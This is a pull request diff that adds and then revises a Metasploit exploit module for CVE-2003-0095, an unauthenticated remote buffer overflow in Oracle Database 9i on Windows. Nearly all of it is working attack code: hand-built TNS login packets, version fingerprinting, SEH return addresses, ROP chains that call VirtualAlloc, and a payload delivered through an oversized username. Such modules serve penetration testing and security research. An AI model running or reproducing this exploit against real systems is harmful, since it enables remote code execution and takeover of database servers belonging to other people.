### PR TITLE
Added exploit module for CVE-2003-0095

### DIFF
--- a/modules/exploits/windows/oracle/oraloadpsp.rb
+++ b/modules/exploits/windows/oracle/oraloadpsp.rb
@@ -1,0 +1,339 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+	include Msf::Exploit::Remote::TNS
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle Database Server Unauthenticated Remote Overflow',
+			'Description'    => %q{
+
+				Buffer overflow in ORACLE.EXE for Oracle Database Server 9i, 8i, 8.1.7, and 8.0.6 allows 
+			remote attackers to execute arbitrary code via a long username that is provided during login, as 
+			exploitable through client applications that perform their own authentication, as demonstrated 
+			using LOADPSP.
+				
+			},
+			'Author'         => [ 
+						'dominicwang <domz.wang@nopsec.com>',
+						'corelanc0d3r <peter.ve@corelan.be>',
+					    ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2003-0095'],
+					[ 'OSVDB', '6319'],
+					[ 'BID', '6849'],
+					[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0095' ],
+					[ 'URL', 'http://www.cvedetails.com/cve/CVE-2003-0095/' ],
+				],
+			'Privileged'     => false,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 566,
+					'BadChars' => "",	#None
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+					[ 'Oracle 9.0.1.1.1 Enterprise Edition',
+						{
+							'Ret' => 0x62314d66,
+							# 0x62314d66 : pop ebp # pop ecx # ret  | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora90\bin\ORATRACE9.dll)
+							'Offset' => 840
+						}
+					],
+					[ 'Oracle 9.2.0.1.0 Enterprise Edition',
+						{
+							'Ret' => 0x62326134,
+							# 0x62326134 : pop ecx # pop ecx # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora92\bin\ORATRACE9.dll)
+							'Offset' => 1000
+						}
+					],
+					[ 'Oracle 9.0.1.1.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 (OptOut)',
+						{
+							
+							'Ret' => 0x6230d3a7,
+							'Offset' => 840
+						}
+					]
+
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'March 3 2003'))
+
+		register_options(
+			[
+				OptString.new('SID', [ true, 'The target database SID', 'ORCL']),
+				Opt::RPORT(1521)
+			], self.class)
+	end
+	def check
+		version = tns_version
+		if (not version)
+			fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
+		end
+		print_status("Oracle version reply: " + version)
+		return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 9\.0\.1\.1\.1/)
+		return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 9\.2\.0\.1\.0/)
+		return Exploit::CheckCode::Safe
+	end
+	def exploit
+
+		oracle_target = nil
+		nseh = "\xeb\x06\x41\x41"
+		if target.name =~ /Automatic/
+			print_status("Attempting automatic target detection...")
+			version = tns_version
+			if (not version)
+				fail_with(Exploit::Failure::NoTarget, "Unable to detect the Oracle version!")
+			end
+			if (version =~ /32-bit Windows: Version 9\.0\.1\.1\.1/)
+				oracle_target = targets[1]
+				username = rand_text_alpha_upper(oracle_target['Offset'])+ 
+					nseh + [oracle_target.ret].pack('V') + 
+					make_nops(328) + payload.encoded
+			elsif (version =~ /32-bit Windows: Version 9\.2\.0\.1\.0/)
+				oracle_target = targets[2]
+				username = rand_text_alpha_upper(oracle_target['Offset'])+ 
+					nseh + [oracle_target.ret].pack('V') + 
+					make_nops(328) + payload.encoded
+			end
+			if (not oracle_target)
+				fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
+			end
+			print_status("Automatically detected target \"#{oracle_target.name}\"")
+
+		elsif target.name =~ /Oracle 9\.0\.1\.1\.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 \(OptOut\)/
+			oracle_target = targets[3]
+			print_status("Attacking using target \"#{oracle_target.name}\"")
+			username = 
+				"\x2e\xd3\x31\x62" * ((oracle_target['Offset'])/4) +	# Padding 844 bytes with the address 0x6231d32e
+				[oracle_target.ret].pack('V') + "\x34\xd3\x31\x62"*61 +	# 0x6230d3a7 # ROP sled (RET) 6231d334 
+				create_rop_chain() + make_nops(20) + payload.encoded
+		else
+			oracle_target = target
+			uusername = rand_text_alpha_upper(oracle_target['Offset'])+ 
+				nseh + [oracle_target.ret].pack('V') + 
+				make_nops(54) + payload.encoded
+		end
+	
+		connect
+		print_status("Sending TNS packet ...")
+		connect_data = "" +
+			"(DESCRIPTION=" +
+					"(ADDRESS=" +
+					"(PROTOCOL=TCP)" +
+					"(HOST=#{datastore['RHOST']})" +
+					"(PORT=1521)" +
+				")" +
+				"(CONNECT_DATA=" +
+					"(SERVER=DEDICATED)" +
+					"(SID=#{datastore['SID']})"+
+					"(CID=" +
+						"(PROGRAM=C:\\oracle\\ora90\\bin\\loadpsp.exe)" +
+						"(HOST=ROOT-23D931A0FC)" +
+						"(USER=Administrator)" +
+					")" +
+				")" +
+			
+			")"
+
+		packet_length = [58 + connect_data.length].pack('n')
+		tns_pkt = packet_length
+		tns_pkt << "\x00\x00"	# Packet Checksum
+		tns_pkt << "\x01"	# Packet Type: Connect (1)
+		tns_pkt << "\x00"	# Reserved Byte: 00
+		tns_pkt << "\x00\x00"	# Header Checksum: 0x0000
+		tns_pkt << "\x01\x37"	# Version: 311
+		tns_pkt << "\x01\x2C"	# Version (Compatible): 300
+		tns_pkt << "\x00\x00"	# Service Options: 0x0000
+		tns_pkt << "\x08\x00"	# Session Data Unit Size: 2048 
+		tns_pkt << "\x7F\xFF"	# Maximum Transmission Data Unit Size: 32767
+		tns_pkt << "\xa3\x0a"	# NT Protocol Characteristics: 0x860e
+		tns_pkt << "\x00\x00"	# Line Turnaround Value: 0
+		tns_pkt << "\x01\x00"	# Value of 1 in Hardware: 0100
+		tns_pkt << [connect_data.length].pack('n')
+		tns_pkt << "\x00\x3A"	# Offset to Connect Data: 58
+		tns_pkt << "\x00\x00\x02\x00"	# Maximum Receivable Connect Data: 512
+		tns_pkt << "\x01"	# Connect Flags 0: 0x61
+		tns_pkt << "\x01"	# Connect Flags 1: 0x61
+		tns_pkt << "\x00\x00\x00\x00"	# Trace Cross Facility Item 1: 0x00000000
+		tns_pkt << "\x00\x00\x00\x00"	# Trace Cross Facility Item 2: 0x00000000
+		tns_pkt << "\x00\x00\x0c\xb0\x00\x00\x00\x00"	# Trace Unique Connection ID	
+		tns_pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
+
+		tns_pkt << connect_data	# Connect Data
+		sock.put(tns_pkt)
+
+		res = sock.get_once(-1, 1)
+		print_status(("Received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+		redir_port = /PORT=(\d+)/.match(res)[1]
+		print_status("Redirected to port: %d" % redir_port)	
+		
+		disconnect
+		datastore['RPORT'] =  redir_port
+		connect
+		print_status("Re-sending TNS packet to port %d..." % redir_port)
+		sock.put(tns_pkt)
+		begin
+			res = sock.get_once(-1, 1)
+		rescue ::Errno::ECONNRESET, EOFError
+			fail_with(Exploit::Failure::Unknown, "OOPS!")
+		end
+		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
+
+		print_status("Sending deadbeef packet ...")
+		tns_deadbeef = [0xdeadbeef].pack('N') + "\x00\x9b\x09\x00\x11\x00\x00\x04\x00\x00\x04\x00" +
+			"\x03\x00\x00\x00\x00\x00\x04\x00\x05\x09\x00\x11\x00\x00\x08\x00" +
+			"\x01\x00\x00\x0c\xb0\xbf\xc8\xfb\x9e\x00\x12\x00\x01\xde\xad\xbe" +			
+			"\xef\x00\x03\x00\x00\x00\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00" +
+			"\x01\x00\x05\x00\x00\x00\x00\x00\x04\x00\x05\x09\x00\x11\x00\x00" +
+			"\x02\x00\x03\xe0\xe1\x00\x02\x00\x06\xfc\xff\x00\x01\x00\x02\x01" +
+			"\x00\x03\x00\x00\x4e\x54\x53\x00\x02\x00\x02\x00\x00\x00\x00\x00" +
+			"\x04\x00\x05\x09\x00\x11\x00\x00\x09\x00\x01\x00\x06\x0c\x0a\x0b" +
+			"\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00\x05" +
+			"\x09\x00\x11\x00\x00\x03\x00\x01\x00\x03\x01"
+		tns_deadbeef_pkt = nsptda_packet(tns_deadbeef)
+		sock.put(tns_deadbeef_pkt)
+		res = sock.get_once(-1, 1)
+		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
+
+		print_status("Sending deadbeef_workgroup packet ...")
+		deadbeef_workgroup = [0xdeadbeef].pack('N') + "\x00\x99\x09\x00\x11\x00\x00\x01\x00\x00\x01\x00" +
+			"\x07\x00\x00\x00\x00\x00\x04\x00\x05\x02\x00\x00\x00\x00\x04\x00" +
+			"\x04\x00\x00\x00\x00\x00\x04\x00\x04\x00\x00\x00\x02\x00\x14\x00" +
+			"\x01\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x04\x00\x01\x00\x00\x00\x00\x00\x04\x00" +
+			"\x01\x40\x00\x00\x00\x00\x40\x00\x01\x4e\x54\x4c\x4d\x53\x53\x50" +
+			"\x00\x01\x00\x00\x00\x07\xb2\x08\xa2\x09\x00\x09\x00\x37\x00\x00" +
+			"\x00\x0f\x00\x0f\x00\x28\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00" +
+			"\x0f\x52\x4f\x4f\x54\x2d\x32\x33\x44\x39\x33\x31\x41\x30\x46\x43" +
+			"\x57\x4f\x52\x4b\x47\x52\x4f\x55\x50"  
+		deadbeef_workgroup_pkt = nsptda_packet(deadbeef_workgroup)
+		sock.put(deadbeef_workgroup_pkt)
+		res = sock.get_once(-1, 1)
+		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+
+		print_status("Sending deadbeef_ntlmssp packet ...")
+		deadbeef_ntlmssp = [0xdeadbeef].pack('N') + "\x00\xef\x09\x00\x11\x00\x00\x01\x00\x00\x01\x00" +
+			"\x02\x00\x00\x00\x00\x00\x04\x00\x01\xce\x00\x00\x00\x00\xce\x00" +
+			"\x01\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00\x00\x18\x00\x18" +
+			"\x00\x9e\x00\x00\x00\x18\x00\x18\x00\xb6\x00\x00\x00\x1e\x00\x1e" +
+			"\x00\x48\x00\x00\x00\x1a\x00\x1a\x00\x66\x00\x00\x00\x1e\x00\x1e" +
+			"\x00\x80\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x05\x82\x88" +
+			"\xa2\x05\x01\x28\x0a\x00\x00\x00\x0f\x52\x00\x4f\x00\x4f\x00\x54" +
+			"\x00\x2d\x00\x32\x00\x33\x00\x44\x00\x39\x00\x33\x00\x31\x00\x41" +
+			"\x00\x30\x00\x46\x00\x43\x00\x41\x00\x64\x00\x6d\x00\x69\x00\x6e" +
+			"\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00\x72" +
+			"\x00\x52\x00\x4f\x00\x4f\x00\x54\x00\x2d\x00\x32\x00\x33\x00\x44" +
+			"\x00\x39\x00\x33\x00\x31\x00\x41\x00\x30\x00\x46\x00\x43\x00\x82" +
+			"\x72\x61\xaa\xfa\xa7\xbd\x5b\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x0d\x5a\x05\x07\x57\x12\xb4\x03\x72" + 
+			"\xab\xea\xae\x09\xfe\x47\x4d\x66\x7a\xc7\x6f\x76\x5b\x25\xdb"   
+		deadbeef_ntlmssp_pkt = nsptda_packet(deadbeef_ntlmssp)
+		sock.put(deadbeef_ntlmssp_pkt)
+		# res = sock.get_once(-1, 1)
+		# print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+
+		print_status("Sending sql_ssp packet ...")
+		sql_ssp = 
+			"\x01\x06\x05\x04\x03\x02\x01\x00\x49\x42\x4d\x50\x43\x2f\x57\x49" +
+			"\x4e\x5f\x4e\x54\x2d\x38\x2e\x31\x2e\x30\x00"
+		sql_ssp_pkt = nsptda_packet(sql_ssp)
+		sock.put(sql_ssp_pkt)
+		res = sock.get_once(-1, 1)
+		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
+	
+		print_status("Sending sql_ssdt packet ...")
+		sql_ssdt = "\x02\xb2\x00\xb2\x00\x00\x15\x06\x01\x01\x01\x05\x01\x01\x01\x01" +
+			"\x01\x01\x01\x01\x01\x01\x07\x07\x03\x05\x03\x00\x02\x02\x01\x80" +
+			"\x00\x00\x00\x3c\x3c\x3c\x80\x00\x00\x00"
+
+		sql_ssdt_pkt = nsptda_packet(sql_ssdt)
+		sock.put(sql_ssdt_pkt)
+		res = sock.get_once(-1, 1)
+		print_status(("Received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
+
+   		host_str = "ROOT-23D931A0FCWORKGROUP\\ROOT-23D931A0FCAdministrator3248:2664loadpsp.exe";
+		print_status("Exploiting with host string: %s" % host_str)
+		
+   		tns_login =
+			"\x03\x52\x02\x53\x44\x32\x00\xd2\x07\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+			"\x00\x00\x00\x3a\xbb\xd6\x00\x0f\x00\x00\x00\x79\xbc\xd6\x00\x1a" +
+			"\x00\x00\x00\x39\xbc\xd6\x00\x0d\x00\x00\x00\x30\x11\x00\x00\xf9" +
+			"\xbc\xd6\x00\x09\x00\x00\x00\x09\xbd\xd6\x00\x0b\x00\x00\x00\x00" +
+			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca" + 
+			"\xb6\xd6\x00\x21\x00\x00\x00\xc8\xb6\xd6\x00" + username
+			
+		tns_login_pkt = nsptda_packet(tns_login)
+		sock.put(tns_login_pkt)
+		tns_login = "A"*300 + host_str
+		tns_login_pkt = nsptda_packet(tns_login)
+		sock.put(tns_login_pkt)
+				
+		handler
+		sleep(10)
+		disconnect
+	end
+	def create_rop_chain()
+		rop_gadgets = 
+		[
+			0x004a9cb1,	# POP EBP # RETN [ORACLE.EXE] 
+			0x004a9cb1,	# skip 4 bytes [ORACLE.EXE]
+			0x0055a3ad,	# POP EBX # RETN [ORACLE.EXE] 
+			0x00000001,	# 0x00000001-> ebx
+			0x615aa6a2,	# POP EDX # RETN [orannzsbb9.dll] 
+			0x00001000,	# 0x00001000-> edx
+			0x615ced5a,	# POP ECX # RETN [orannzsbb9.dll] 
+			0x00000040,	# 0x00000040-> ecx
+			0x010238dc,	# POP EDI # RETN [ORACLE.EXE] 
+			0x61607ec8,	# RETN (ROP NOP) [orannzsbb9.dll]
+			0x0099c854,	# POP ESI # RETN [ORACLE.EXE] 
+			0x619616a4,	# JMP [EAX] [oranldap9.dll]
+			0x60b0ec89,	# POP EAX # RETN [orapls9.dll] 
+			0x6232f128,	# ptr to &VirtualAlloc() [IAT ORATRACE9.dll]
+			0x6043c453,	# PUSHAD # RETN [orageneric9.dll] 
+			0x61961c88,	# ptr to 'push esp # ret ' [oranldap9.dll]
+		].flatten.pack("V*")
+		return rop_gadgets
+
+	end
+	def tns_version
+		# Snipplet from exploit/windows/oracle/tns_auth_sesskey.rb
+		connect
+		version = "(CONNECT_DATA=(COMMAND=VERSION))"
+		pkt = tns_packet(version)
+		sock.put(pkt)
+		sock.get_once
+		res = sock.get_once(-1, 1)
+		disconnect
+		return res
+	rescue EOFError
+		return nil
+	end
+	def nsptda_packet(data)
+		# Snipplet from exploit/windows/oracle/tns_auth_sesskey.rb
+		pkt = [data.length + 10].pack('n') 
+		pkt << [0].pack('n')
+		pkt << [6].pack('C') 
+		pkt << [0].pack('C') 
+		pkt << [0].pack('n') 
+		pkt << [0].pack('n')
+		pkt << data
+		return pkt
+	end
+end

--- a/modules/exploits/windows/oracle/oraloadpsp.rb
+++ b/modules/exploits/windows/oracle/oraloadpsp.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Oracle Database Server Unauthenticated Remote Overflow',
+			'Name'           => 'Oracle Database Server 9 Unauthenticated Remote Overflow',
 			'Description'    => %q{
 
 			Buffer overflow in ORACLE.EXE for Oracle Database Server 9i allows
@@ -47,30 +47,34 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					[ 'Automatic', { } ],
-					[ 'Oracle 9.0.1.1.1 Enterprise Edition',
+					[ 'Oracle 9.0.1.1.1 Enterprise Edition (OptIn)',
 						{
 							'Ret' => 0x62314d66,
-							# 0x62314d66 : pop ebp # pop ecx # ret  | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False,
-							#Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora90\bin\ORATRACE9.dll)
+							# 0x62314d66 : pop ebp # pop ecx # ret
 							'Offset' => 840
 						}
 					],
-					[ 'Oracle 9.2.0.1.0 Enterprise Edition',
+					[ 'Oracle 9.2.0.1.0 Enterprise Edition (OptIn)',
 						{
 							'Ret' => 0x62326134,
-							# 0x62326134 : pop ecx # pop ecx # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False,
-							#Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora92\bin\ORATRACE9.dll)
+							# 0x62326134 : pop ecx # pop ecx # ret
 							'Offset' => 1000
 						}
 					],
-					[ 'Oracle 9.0.1.1.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 (OptOut)',
+					[ 'Oracle 9.0.1.1.1 Enterprise Edition (OptOut)', # Default
+					# Tested on Microsoft Windows Server 2003 Enterprise Edition Service Pack 2
 						{
-
 							'Ret' => 0x6230d3a7,
-							'Offset' => 840
+							'Offset' => 844
+						}
+					],
+					[ 'Oracle 9.2.0.1.0 Enterprise Edition (OptOut)', # Default
+						{
+					# Tested on Microsoft Windows Server 2003 Enterprise Edition Service Pack 2
+							'Ret' => 0x6230c9c9,
+							'Offset' => 1004
 						}
 					]
-
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Mar 3 2003'))
@@ -102,35 +106,50 @@ class Metasploit3 < Msf::Exploit::Remote
 				fail_with(Exploit::Failure::NoTarget, "Unable to detect the Oracle version!")
 			end
 			if (version =~ /32-bit Windows: Version 9\.0\.1\.1\.1/)
-				oracle_target = targets[1]
-				username = rand_text_alpha_upper(oracle_target['Offset'])+
-					nseh + [oracle_target.ret].pack('V') +
-					make_nops(328) + payload.encoded
+				oracle_target = targets[3]
+				# print_status("Attacking using target \"#{oracle_target.name}\"")
+				username =
+					"\x2e\xd3\x31\x62"*((oracle_target['Offset'])/4) + # Padding  844 bytes with the address 0x6231d32e
+					[oracle_target.ret].pack('V') +
+					"\x34\xd3\x31\x62"*61 +	# 0x6230d3a7 # ROP sled (RET) 6231d334
+					ora901_rop_chain() + make_nops(20) + payload.encoded
+
 			elsif (version =~ /32-bit Windows: Version 9\.2\.0\.1\.0/)
-				oracle_target = targets[2]
-				username = rand_text_alpha_upper(oracle_target['Offset'])+
-					nseh + [oracle_target.ret].pack('V') +
-					make_nops(328) + payload.encoded
+				oracle_target = targets[4]
+				# print_status("Attacking using target \"#{oracle_target.name}\"")
+				username =
+					"\x0a\xd4\x31\x62"*((oracle_target['Offset'])/4) + # Padding 1004 bytes with the address 0x6231d40a : ADD ESP,110 # RETN
+					[oracle_target.ret].pack('V') + # 0x6230c9c9 : POP EBP # POP EBX # ADD ESP,88C # RETN
+					"\x10\xd4\x31\x62"*61 + # 0x6231d410 : ROP sled (RET)
+					ora920_rop_chain() + make_nops(20) + payload.encoded
 			end
 			if (not oracle_target)
 				fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
 			end
 			print_status("Automatically detected target \"#{oracle_target.name}\"")
 
-		elsif target.name =~ /Oracle 9\.0\.1\.1\.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 \(OptOut\)/
+		elsif target.name =~ /Oracle 9\.0\.1\.1\.1 Enterprise Edition \(OptOut\)/
 			oracle_target = targets[3]
 			print_status("Attacking using target \"#{oracle_target.name}\"")
 			username =
-				"\x2e\xd3\x31\x62" * ((oracle_target['Offset'])/4) +# Padding 844 bytes with the address 0x6231d32e
-				[oracle_target.ret].pack('V') + "\x34\xd3\x31\x62"*61 +# 0x6230d3a7 # ROP sled (RET) 6231d334
-				create_rop_chain() + make_nops(20) + payload.encoded
+				"\x2e\xd3\x31\x62"*((oracle_target['Offset'])/4) + # Padding  844 bytes with the address 0x6231d32e
+				[oracle_target.ret].pack('V') +
+				"\x34\xd3\x31\x62"*61 +	# 0x6230d3a7 # ROP sled (RET) 6231d334
+				ora901_rop_chain() + make_nops(20) + payload.encoded
+		elsif target.name =~ /Oracle 9\.2\.0\.1\.0 Enterprise Edition \(OptOut\)/
+			oracle_target = targets[4]
+			print_status("Attacking using target \"#{oracle_target.name}\"")
+			username =
+				"\x0a\xd4\x31\x62"*((oracle_target['Offset'])/4) + # Padding 1004 bytes with the address 0x6231d40a : ADD ESP,110 # RETN
+				[oracle_target.ret].pack('V') + # 0x6230c9c9 : POP EBP # POP EBX # ADD ESP,88C # RETN
+				"\x10\xd4\x31\x62"*61 + # 0x6231d410 : ROP sled (RET)
+				ora920_rop_chain() + make_nops(20) + payload.encoded
 		else
 			oracle_target = target
-			uusername = rand_text_alpha_upper(oracle_target['Offset'])+
+			username = rand_text_alpha_upper(oracle_target['Offset'])+
 				nseh + [oracle_target.ret].pack('V') +
-				make_nops(54) + payload.encoded
+				make_nops(328) + payload.encoded
 		end
-
 		connect
 		print_status("Sending TNS packet ...")
 		connect_data = "" +
@@ -149,7 +168,6 @@ class Metasploit3 < Msf::Exploit::Remote
 						"(USER=Administrator)" +
 					")" +
 				")" +
-
 			")"
 
 		packet_length = [58 + connect_data.length].pack('n')
@@ -186,13 +204,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		disconnect
 		connect(true, {'RPORT' => redir_port})
-		connect
 		print_status("Re-sending TNS packet to port %d..." % redir_port)
 		sock.put(tns_pkt)
 		begin
 			res = sock.get_once(-1, 1)
 		rescue ::Errno::ECONNRESET, EOFError
-			fail_with(Exploit::Failure::Unknown, "Connection Error.")
+			fail_with(Exploit::Failure::Unknown, "Connection Error. Perhaps the service hasn't started completely!")
 		end
 		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 
@@ -279,17 +296,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			"\xbc\xd6\x00\x09\x00\x00\x00\x09\xbd\xd6\x00\x0b\x00\x00\x00\x00" +
 			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca" +
 			"\xb6\xd6\x00\x21\x00\x00\x00\xc8\xb6\xd6\x00" + username
-
 		tns_login_pkt = nsptda_packet(tns_login)
 		sock.put(tns_login_pkt)
-		tns_login = "A"*300 + host_str
+		tns_login = rand_text_alpha_upper(300) + host_str
 		tns_login_pkt = nsptda_packet(tns_login)
 		sock.put(tns_login_pkt)
-
-		select(nil, nil, nil, 10)
 		disconnect
 	end
-	def create_rop_chain()
+	def ora901_rop_chain()
 		rop_gadgets =
 		[
 			0x004a9cb1,	# POP EBP # RETN [ORACLE.EXE]
@@ -310,7 +324,29 @@ class Metasploit3 < Msf::Exploit::Remote
 			0x61961c88,	# ptr to 'push esp # ret ' [oranldap9.dll]
 		].flatten.pack("V*")
 		return rop_gadgets
+	end
 
+	def ora920_rop_chain()
+		rop_gadgets =
+		[
+			0x10191858,	# POP EBP # RETN [orajox9.dll]
+			0x10191858,	# skip 4 bytes [orajox9.dll]
+			0x615cf107,	# POP EBX # RETN [orannzsbb9.dll]
+			0x00000001,	# 0x00000001-> ebx
+			0x008c5e92,	# POP EDX # RETN [ORACLE.EXE]
+			0x00001000,	# 0x00001000-> edx
+			0x00bde581,	# POP ECX # RETN [ORACLE.EXE]
+			0x00000040,	# 0x00000040-> ecx
+			0x00dfb6e6,	# POP EDI # RETN [ORACLE.EXE]
+			0x015f1aed,	# RETN (ROP NOP) [ORACLE.EXE]
+			0x615dbc76,	# POP ESI # RETN [orannzsbb9.dll]
+			0x61111517,	# JMP [EAX] [oracore9.dll]
+			0x00884bb4,	# POP EAX # RETN [ORACLE.EXE]
+			0x61124100,	# ptr to &VirtualAlloc() [IAT oracore9.dll]
+			0x615a4d64,	# PUSHAD # RETN [orannzsbb9.dll]
+			0x61963015,	# ptr to 'push esp # ret ' [oranldap9.dll]
+		].flatten.pack("V*")
+		return rop_gadgets
 	end
 	def tns_version
 		# Snipplet from exploit/windows/oracle/tns_auth_sesskey.rb

--- a/modules/exploits/windows/oracle/oraloadpsp.rb
+++ b/modules/exploits/windows/oracle/oraloadpsp.rb
@@ -15,24 +15,22 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'Oracle Database Server Unauthenticated Remote Overflow',
 			'Description'    => %q{
 
-				Buffer overflow in ORACLE.EXE for Oracle Database Server 9i, 8i, 8.1.7, and 8.0.6 allows 
-			remote attackers to execute arbitrary code via a long username that is provided during login, as 
-			exploitable through client applications that perform their own authentication, as demonstrated 
+			Buffer overflow in ORACLE.EXE for Oracle Database Server 9i allows
+			remote attackers to execute arbitrary code via a long username that is provided during login, as
+			exploitable through client applications that perform their own authentication, as demonstrated
 			using LOADPSP.
-				
+
 			},
-			'Author'         => [ 
+			'Author'         => [
 						'dominicwang <domz.wang@nopsec.com>',
 						'corelanc0d3r <peter.ve@corelan.be>',
-					    ],
+							],
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
 					[ 'CVE', '2003-0095'],
 					[ 'OSVDB', '6319'],
 					[ 'BID', '6849'],
-					[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0095' ],
-					[ 'URL', 'http://www.cvedetails.com/cve/CVE-2003-0095/' ],
 				],
 			'Privileged'     => false,
 			'DefaultOptions' =>
@@ -51,20 +49,22 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Oracle 9.0.1.1.1 Enterprise Edition',
 						{
 							'Ret' => 0x62314d66,
-							# 0x62314d66 : pop ebp # pop ecx # ret  | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora90\bin\ORATRACE9.dll)
+							# 0x62314d66 : pop ebp # pop ecx # ret  | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False,
+							#Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora90\bin\ORATRACE9.dll)
 							'Offset' => 840
 						}
 					],
 					[ 'Oracle 9.2.0.1.0 Enterprise Edition',
 						{
 							'Ret' => 0x62326134,
-							# 0x62326134 : pop ecx # pop ecx # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora92\bin\ORATRACE9.dll)
+							# 0x62326134 : pop ecx # pop ecx # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ} [ORATRACE9.dll] ASLR: False,
+							#Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\oracle\ora92\bin\ORATRACE9.dll)
 							'Offset' => 1000
 						}
 					],
 					[ 'Oracle 9.0.1.1.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 (OptOut)',
 						{
-							
+
 							'Ret' => 0x6230d3a7,
 							'Offset' => 840
 						}
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				],
 			'DefaultTarget' => 0,
-			'DisclosureDate' => 'March 3 2003'))
+			'DisclosureDate' => 'Mar 3 2003'))
 
 		register_options(
 			[
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		version = tns_version
 		if (not version)
-			fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
+			return Exploit::CheckCode::Unknown
 		end
 		print_status("Oracle version reply: " + version)
 		return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 9\.0\.1\.1\.1/)
@@ -102,13 +102,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 			if (version =~ /32-bit Windows: Version 9\.0\.1\.1\.1/)
 				oracle_target = targets[1]
-				username = rand_text_alpha_upper(oracle_target['Offset'])+ 
-					nseh + [oracle_target.ret].pack('V') + 
+				username = rand_text_alpha_upper(oracle_target['Offset'])+
+					nseh + [oracle_target.ret].pack('V') +
 					make_nops(328) + payload.encoded
 			elsif (version =~ /32-bit Windows: Version 9\.2\.0\.1\.0/)
